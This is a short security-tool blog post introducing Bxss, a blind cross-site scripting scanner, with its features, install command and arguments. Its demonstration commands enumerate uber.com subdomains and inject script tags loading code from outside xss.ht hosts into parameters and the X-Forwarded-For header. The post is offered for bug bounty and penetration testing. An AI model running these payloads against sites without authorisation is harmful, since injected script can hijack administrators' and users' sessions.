Offensive Security Tool: Bxss – Blind XSS Scanner

by | Mar 14, 2025 | Tools

Join our Patreon Channel and Gain access to 70+ Exclusive Walkthrough Videos.

Patreon
Reading Time: 2 Minutes

Bxss – Blind XSS Scanner

Bxss – Blind XSS Scanner, developed by ethicalhackingplayground, is a tool designed to detect blind Cross-Site Scripting (XSS) vulnerabilities in web applications by injecting custom payloads into headers and parameters. Unlike traditional XSS, blind XSS triggers in scenarios where the injected payload is stored and executed asynchronously, such as in admin panels, logging systems, or third-party integrations.

See Also: A Practical Guide to Hacking Techniques for finding Top Bugs.
The Bug Bounty Hunting Course

Features

  • Inject Blind XSS payloads into custom headers
  • Inject Blind XSS payloads into parameters
  • Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
  • Tool Chaining
  • Really fast
  • Easy to setup

 

Install

go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

Arguments

ArgumentDescriptionDefault
-appendModeAppend the payload to the parameter 
-concurrency intSet the concurrency30
-header stringSet the custom header“User-Agent”
-headerFile stringPath to file containing headers to test 
-parametersTest the parameters for blind xss 
-payload stringThe blind XSS payload 
-payloadFile stringPath to file containing payloads to test

 

Demonstration

Blind XSS In Parameters

subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters
 

Blind XSS In X-Forwarded-For Header

subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"
 

 

Clone the repo from here: GitHub Link

Merch

Recent Tools

Offensive Security & Ethical Hacking Course

Begin the learning curve of hacking now!


Information Security Solutions

Find out how Pentesting Services can help you.


Join our Community

Share This